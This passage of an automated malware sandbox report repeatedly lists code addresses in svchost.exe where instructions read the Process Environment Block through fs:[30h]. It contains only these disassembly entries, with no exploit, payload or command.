            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]2_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A830 mov eax, dword ptr fs:[00000030h]2_2_0376A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]2_2_037D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]2_2_037D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC810 mov eax, dword ptr fs:[00000030h]2_2_037BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]2_2_0376C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]2_2_0376C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA8E4 mov eax, dword ptr fs:[00000030h]2_2_037FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E8C0 mov eax, dword ptr fs:[00000030h]2_2_0375E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC89D mov eax, dword ptr fs:[00000030h]2_2_037BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730887 mov eax, dword ptr fs:[00000030h]2_2_03730887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]2_2_0375AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375AF69 mov eax, dword ptr fs:[00000030h]2_2_0375AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h]2_2_037D2F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2F60 mov eax, dword ptr fs:[00000030h]2_2_037D2F60
